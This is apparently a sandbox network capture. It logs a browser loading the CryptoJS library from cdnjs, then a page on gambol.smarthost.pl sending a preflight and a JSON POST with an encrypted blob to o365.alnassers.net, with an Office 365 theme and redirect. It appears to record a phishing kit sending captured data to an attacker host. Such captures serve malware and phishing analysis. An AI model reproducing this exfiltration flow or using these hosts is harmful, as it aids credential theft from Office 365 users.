                                                                                      2024-11-15 17:09:05 UTC1369INData Raw: 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32
                                                                                      Data Ascii: >>>6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=42
                                                                                      2024-11-15 17:09:05 UTC1369INData Raw: 29 2c 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b
                                                                                      Data Ascii: ),S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[
                                                                                      2024-11-15 17:09:05 UTC1369INData Raw: 69 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72
                                                                                      Data Ascii: i.clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;retur
                                                                                      2024-11-15 17:09:05 UTC1369INData Raw: 28 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72
                                                                                      Data Ascii: (o),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      26192.168.2.1662648104.17.25.144437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:06 UTC386OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                      Host: cdnjs.cloudflare.com
                                                                                      Connection: keep-alive
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: none
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:06 UTC962INHTTP/1.1 200 OK
                                                                                      Date: Fri, 15 Nov 2024 17:09:06 GMT
                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: public, max-age=30672000
                                                                                      ETag: W/"5eb03e2d-bb78"
                                                                                      Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Timing-Allow-Origin: *
                                                                                      X-Content-Type-Options: nosniff
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 290807
                                                                                      Expires: Wed, 05 Nov 2025 17:09:06 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUI348DmTorVt6bIvblFhV2uIKDWKRhuj96RWQiI3Ca%2BH%2FIDgOl46TAYQxp%2FWhPGD09s33BodqY4QoewBBlvKTyWSximLcyDEhJMpLr%2FO%2FPiBWmHisfn0NGxgRb8Ed4eDyxe2ZuE"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8e30d8ddee176b71-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      2024-11-15 17:09:06 UTC407INData Raw: 37 62 65 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                      Data Ascii: 7bef!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                      2024-11-15 17:09:06 UTC1369INData Raw: 26 28 74 3d 77 69 6e 64 6f 77 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                                      Data Ascii: &(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typ
                                                                                      2024-11-15 17:09:06 UTC1369INData Raw: 20 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 2b 29 7b 76 61 72 20 73 3d 72 5b 6f 3e 3e 3e 32 5d 3e 3e 3e 32 34 2d 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75
                                                                                      Data Ascii: o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:fu
                                                                                      2024-11-15 17:09:06 UTC1369INData Raw: 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 6c 2e 63 65 69 6c 28 73 29 3a 6c 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 61 3d 6c 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 63 3b 68 2b 3d 6f 29 74 68 69 73 2e 5f 64 6f 50 72
                                                                                      Data Ascii: se(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?l.ceil(s):l.max((0|s)-this._minBufferSize,0))*o,a=l.min(4*c,n);if(c){for(var h=0;h<c;h+=o)this._doPr
                                                                                      2024-11-15 17:09:06 UTC1369INData Raw: 35 35 3d 3d 3d 69 3f 69 3d 30 3a 2b 2b 69 29 3a 2b 2b 72 29 3a 2b 2b 65 2c 74 3d 30 2c 74 2b 3d 65 3c 3c 31 36 2c 74 2b 3d 72 3c 3c 38 2c 74 2b 3d 69 7d 65 6c 73 65 20 74 2b 3d 31 3c 3c 32 34 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 66 74 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 66 74 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 66 74 5b 31 5d 3e 3e
                                                                                      Data Ascii: 55===i?i=0:++i):++r):++e,t=0,t+=e<<16,t+=r<<8,t+=i}else t+=1<<24;return t}function Rt(){for(var t=this._X,e=this._C,r=0;r<8;r++)ft[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<ft[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<ft[1]>>
                                                                                      2024-11-15 17:09:06 UTC1369INData Raw: 32 2b 28 65 5b 34 5d 3e 3e 3e 30 3c 77 74 5b 34 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 36 5d 3d 65 5b 36 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 35 5d 3e 3e 3e 30 3c 77 74 5b 35 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 37 5d 3d 65 5b 37 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 36 5d 3e 3e 3e 30 3c 77 74 5b 36 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 74 68 69 73 2e 5f 62 3d 65 5b 37 5d 3e 3e 3e 30 3c 77 74 5b 37 5d 3e 3e 3e 30 3f 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 2c 73 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 2c 63 3d 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69
                                                                                      Data Ascii: 2+(e[4]>>>0<wt[4]>>>0?1:0)|0,e[6]=e[6]+1295307597+(e[5]>>>0<wt[5]>>>0?1:0)|0,e[7]=e[7]+3545052371+(e[6]>>>0<wt[6]>>>0?1:0)|0,this._b=e[7]>>>0<wt[7]>>>0?1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16,s=((n*n>>>17)+n*o>>>15)+o*o,c=((4294901760&i)*i
                                                                                      2024-11-15 17:09:06 UTC1369INData Raw: 3e 36 2d 6f 25 34 2a 32 2c 61 3d 73 7c 63 3b 69 5b 6e 3e 3e 3e 32 5d 7c 3d 61 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 7d 72 65 74 75 72 6e 20 68 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 7d 2c 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6e 3d 74 2e 61 6c 67 6f 2c 48 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 36 34 3b 74 2b 2b 29 48 5b 74 5d 3d 34 32 39 34
                                                                                      Data Ascii: >6-o%4*2,a=s|c;i[n>>>2]|=a<<24-n%4*8,n++}return h.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="},function(l){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,n=t.algo,H=[];!function(){for(var t=0;t<64;t++)H[t]=4294
                                                                                      2024-11-15 17:09:06 UTC1369INData Raw: 53 3d 41 28 53 2c 6d 2c 78 2c 62 2c 42 2c 35 2c 48 5b 32 38 5d 29 2c 62 3d 41 28 62 2c 53 2c 6d 2c 78 2c 61 2c 39 2c 48 5b 32 39 5d 29 2c 78 3d 41 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 34 2c 48 5b 33 30 5d 29 2c 53 3d 43 28 53 2c 6d 3d 41 28 6d 2c 78 2c 62 2c 53 2c 67 2c 32 30 2c 48 5b 33 31 5d 29 2c 78 2c 62 2c 66 2c 34 2c 48 5b 33 32 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 70 2c 31 31 2c 48 5b 33 33 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 79 2c 31 36 2c 48 5b 33 34 5d 29 2c 6d 3d 43 28 6d 2c 78 2c 62 2c 53 2c 77 2c 32 33 2c 48 5b 33 35 5d 29 2c 53 3d 43 28 53 2c 6d 2c 78 2c 62 2c 63 2c 34 2c 48 5b 33 36 5d 29 2c 62 3d 43 28 62 2c 53 2c 6d 2c 78 2c 6c 2c 31 31 2c 48 5b 33 37 5d 29 2c 78 3d 43 28 78 2c 62 2c 53 2c 6d 2c 75 2c 31 36 2c 48 5b 33 38
                                                                                      Data Ascii: S=A(S,m,x,b,B,5,H[28]),b=A(b,S,m,x,a,9,H[29]),x=A(x,b,S,m,u,14,H[30]),S=C(S,m=A(m,x,b,S,g,20,H[31]),x,b,f,4,H[32]),b=C(b,S,m,x,p,11,H[33]),x=C(x,b,S,m,y,16,H[34]),m=C(m,x,b,S,w,23,H[35]),S=C(S,m,x,b,c,4,H[36]),b=C(b,S,m,x,l,11,H[37]),x=C(x,b,S,m,u,16,H[38
                                                                                      2024-11-15 17:09:06 UTC1369INData Raw: 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 5f 68 61 73 68 3d 74 68 69 73 2e 5f 68 61 73 68 2e 63 6c 6f 6e 65 28 29 2c 74 7d 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 7a 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 72 7c 7e 65 26 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 41 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 26 69 7c 72 26 7e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28 63 3c 3c 6f 7c 63 3e 3e 3e 33 32 2d 6f 29 2b 65 7d 66 75 6e 63 74 69 6f 6e 20 43 28 74 2c 65 2c 72 2c 69 2c 6e 2c 6f 2c 73 29 7b 76 61 72 20 63 3d 74 2b 28 65 5e 72 5e 69 29 2b 6e 2b 73 3b 72 65 74 75 72 6e 28
                                                                                      Data Ascii: clone.call(this);return t._hash=this._hash.clone(),t}});function z(t,e,r,i,n,o,s){var c=t+(e&r|~e&i)+n+s;return(c<<o|c>>>32-o)+e}function A(t,e,r,i,n,o,s){var c=t+(e&i|r&~i)+n+s;return(c<<o|c>>>32-o)+e}function C(t,e,r,i,n,o,s){var c=t+(e^r^i)+n+s;return(
                                                                                      2024-11-15 17:09:06 UTC1369INData Raw: 29 2c 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 76 61 72 20 74 3d 62 74 2c 65 3d 74 2e 6c 69 62 2c 72 3d 65 2e 57 6f 72 64 41 72 72 61 79 2c 69 3d 65 2e 48 61 73 68 65 72 2c 6f 3d 74 2e 61 6c 67 6f 2c 73 3d 5b 5d 2c 42 3d 5b 5d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 6e 2e 73 71 72 74 28 74 29 2c 72 3d 32 3b 72 3c 3d 65 3b 72 2b 2b 29 69 66 28 21 28 74 25 72 29 29 72 65 74 75 72 6e 3b 72 65 74 75 72 6e 20 31 7d 66 75 6e 63 74 69 6f 6e 20 65 28 74 29 7b 72 65 74 75 72 6e 20 34 32 39 34 39 36 37 32 39 36 2a 28 74 2d 28 30 7c 74 29 29 7c 30 7d 66 6f 72 28 76 61 72 20 72 3d 32 2c 69 3d 30 3b 69 3c 36 34 3b 29 74 28 72 29 26 26 28 69 3c 38 26 26 28 73 5b 69 5d 3d 65 28 6e 2e 70 6f 77 28 72 2c 2e
                                                                                      Data Ascii: ),function(n){var t=bt,e=t.lib,r=e.WordArray,i=e.Hasher,o=t.algo,s=[],B=[];!function(){function t(t){for(var e=n.sqrt(t),r=2;r<=e;r++)if(!(t%r))return;return 1}function e(t){return 4294967296*(t-(0|t))|0}for(var r=2,i=0;i<64;)t(r)&&(i<8&&(s[i]=e(n.pow(r,.


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      27192.168.2.1662649147.79.74.1764437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:06 UTC511OUTOPTIONS / HTTP/1.1
                                                                                      Host: o365.alnassers.net
                                                                                      Connection: keep-alive
                                                                                      Accept: */*
                                                                                      Access-Control-Request-Method: POST
                                                                                      Access-Control-Request-Headers: content-type
                                                                                      Origin: https://gambol.smarthost.pl
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://gambol.smarthost.pl/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:07 UTC393INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Fri, 15 Nov 2024 17:09:07 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Content-Length: 0
                                                                                      Connection: close
                                                                                      Vary: origin
                                                                                      access-control-allow-origin: *
                                                                                      access-control-allow-headers: accept, authorization, content-type, user-agent, x-csrftoken, x-requested-with
                                                                                      access-control-allow-methods: GET, POST
                                                                                      access-control-max-age: 86400


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      28192.168.2.1662650147.79.74.1764437040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-11-15 17:09:08 UTC608OUTPOST / HTTP/1.1
                                                                                      Host: o365.alnassers.net
                                                                                      Connection: keep-alive
                                                                                      Content-Length: 218
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      Content-Type: application/json
                                                                                      Accept: */*
                                                                                      Origin: https://gambol.smarthost.pl
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: empty
                                                                                      Referer: https://gambol.smarthost.pl/
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-11-15 17:09:08 UTC218OUTData Raw: 7b 22 70 73 6b 22 3a 22 74 4b 4d 66 65 47 52 57 4b 50 63 4b 63 71 37 68 6d 67 6a 32 61 42 36 66 6b 50 71 2b 77 64 33 4a 75 35 6b 34 45 6b 54 6f 42 42 35 53 6f 63 6d 38 79 6f 73 4a 77 67 46 2f 71 68 52 44 69 70 33 50 64 2f 30 4c 75 76 44 79 33 76 79 61 6c 4c 42 34 32 75 52 2b 31 51 3d 3d 22 2c 22 64 6f 22 3a 22 47 55 52 49 22 2c 22 72 65 64 69 72 65 63 74 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6f 75 74 6c 6f 6f 6b 2e 6f 66 66 69 63 65 33 36 35 2e 63 6f 6d 2f 45 6e 63 72 79 70 74 69 6f 6e 2f 45 72 72 6f 72 50 61 67 65 2e 61 73 70 78 3f 73 72 63 3d 33 26 61 6d 70 3b 63 6f 64 65 3d 31 31 22 2c 22 74 68 65 6d 65 22 3a 22 6f 66 66 69 63 65 22 7d
                                                                                      Data Ascii: {"psk":"tKMfeGRWKPcKcq7hmgj2aB6fkPq+wd3Ju5k4EkToBB5Socm8yosJwgF/qhRDip3Pd/0LuvDy3vyalLB42uR+1Q==","do":"GURI","redirect_url":"https://outlook.office365.com/Encryption/ErrorPage.aspx?src=3&amp;code=11","theme":"office"}
                                                                                      2024-11-15 17:09:09 UTC365INHTTP/1.1 200 OK
